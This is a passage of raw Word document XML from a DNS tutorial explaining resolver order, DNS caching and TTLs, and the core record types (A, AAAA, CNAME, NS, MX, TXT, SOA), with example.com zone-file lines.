        <w:t> It relies entirely on the recursive resolver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FD3E9D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The resolution order on Linux (/etc/nsswitch.conf):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C58073E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081AB942" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>hosts: files dns myhostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0441C377" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="719"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Check /etc/hosts (local hosts file).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F45F54" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="719"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Query DNS (via configured nameserver).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFA1512" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="719"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Fall back to hostname.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B074189" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Applications can also have their OWN DNS behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2069F120" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="720"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Java JVM:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Has its own DNS cache (default: caches positive results forever, negative for 10 seconds). This catches many engineers off guard during failover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B540FA0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="720"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Go:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Uses the OS resolver by default, but can use a pure-Go resolver (avoiding CGO dependency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E82D0B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="720"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Browsers:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Have their own DNS cache (Chrome: chrome://net-internals/#dns).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2014B027" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 Recursive Resolvers — The Heavy Lifters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B681A4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What they are:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Servers that handle the entire resolution process on behalf of clients. Your ISP runs one. Google (8.8.8.8), Cloudflare (1.1.1.1), and Quad9 (9.9.9.9) run public ones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78984744" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What they maintain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F301FB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="721"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A cache</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> of previous query results (the most important optimization in DNS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799F9A79" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="721"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A query pipeline</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> for handling thousands of concurrent resolutions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF61F2C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="721"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prefetching logic</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> to refresh popular entries before TTL expires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F16C7B4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="721"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNSSEC validation</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> (checking cryptographic signatures on DNS responses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F833CF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How the cache works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E869DC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Each cached record has a TTL (Time To Live) set by the authoritative server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A31F8B6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1F2527" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com.  300  IN  A  93.184.216.34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E10424" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                  ^^^</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E688AAE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                  TTL = 300 seconds (5 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9D187D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>The resolver stores this record and serves it for 300 seconds without re-querying. After 300 seconds: the entry is stale, and the next query triggers a fresh resolution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C1671A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Negative caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9D154F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>If a domain doesn't exist (NXDOMAIN), the resolver also caches this negative result (for the SOA record's MINIMUM TTL). This prevents repeated queries for non-existent domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47472867" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="2428C27B">
          <v:rect id="_x0000_i3479" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE5D3CF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. DNS Record Types — The Complete Picture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFB5E3F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Core Record Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5BA3FB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A Record (Address):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AE88DC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC52DFF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com.    300    IN    A    93.184.216.34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638273D0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Maps a name to an IPv4 address. The most fundamental record type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA1ED39" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AAAA Record (IPv6 Address):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45166472" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071840DC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com.    300    IN    AAAA    2606:2800:220:1:248:1893:25c8:1946</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487CEA6C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Maps a name to an IPv6 address. Same as A but for 128-bit addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3A1B68" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CNAME Record (Canonical Name / Alias):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3A4D61" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB771F4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>blog.example.com.    3600    IN    CNAME    example.github.io.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9B973F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Creates an alias. "blog.example.com" is really "example.github.io" — resolve THAT instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E064498" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How CNAME resolution works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01826CF7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="722"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Client queries blog.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039AE905" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="722"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Resolver gets CNAME → example.github.io.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EA1B83" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="722"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Resolver now queries example.github.io (following the chain).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E6CDA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="722"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Gets A record: 185.199.108.153.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2812D63E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="722"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Returns this IP to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B1C37D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CNAME restrictions (critical to understand):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA590BD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="723"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>A CNAME cannot coexist with any other record type at the same name. You cannot have both example.com CNAME ... AND example.com MX ....</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE8617" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="723"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>You </w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> put a CNAME at the zone apex (naked domain). example.com CNAME something.else.com violates the RFC because the apex already has SOA and NS records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5AFB9E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="723"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>This is why many DNS providers invented workarounds: ALIAS/ANAME records (resolved server-side).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C73BF61" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NS Record (Name Server):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F81C40D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604B226D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com.    86400    IN    NS    ns1.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D74AB9B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com.    86400    IN    NS    ns2.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE82463" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Delegates authority for a zone to specific nameservers. "For anything under example.com, ask these servers."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C8C3F4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MX Record (Mail Exchange):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C12473F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64443365" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com.    3600    IN    MX    10    mail1.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27749F1B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com.    3600    IN    MX    20    mail2.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40089A7D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Specifies mail servers for a domain, with priority (lower = preferred). Email sent to user@example.com goes to mail1 first; if unreachable, try mail2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251B726C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TXT Record (Text):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290157E0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33950085" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com.    3600    IN    TXT    "v=spf1 include:_spf.google.com ~all"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7641C77A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>example.com.    3600    IN    TXT    "google-site-verification=abc123..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E995E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Arbitrary text data. Used for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9E8356" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="724"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>SPF (email authentication): which servers are allowed to send email for this domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4521726D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="724"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DKIM (email signing): public keys for email signature verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2FA6ED" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="724"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DMARC (email policy): what to do with failed SPF/DKIM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52239814" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="724"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Domain verification: prove ownership to services (Google, AWS, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8E2A22" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="724"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Custom metadata: anything you want to publish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF31F48" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SOA Record (Start of Authority):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C04118E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23224CEE" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com.    86400    IN    SOA    ns1.example.com. admin.example.com. (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EDFFDA" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                                     2026052801  ; serial number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467D53A4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                                     7200        ; refresh (secondary checks primary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FEA7BF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                                     3600        ; retry (if refresh fails)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54763D2D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                                     1209600     ; expire (secondary stops answering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5715CBAD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                                     86400       ; minimum TTL (negative caching)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A338E00" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">                                     )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DB9442" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
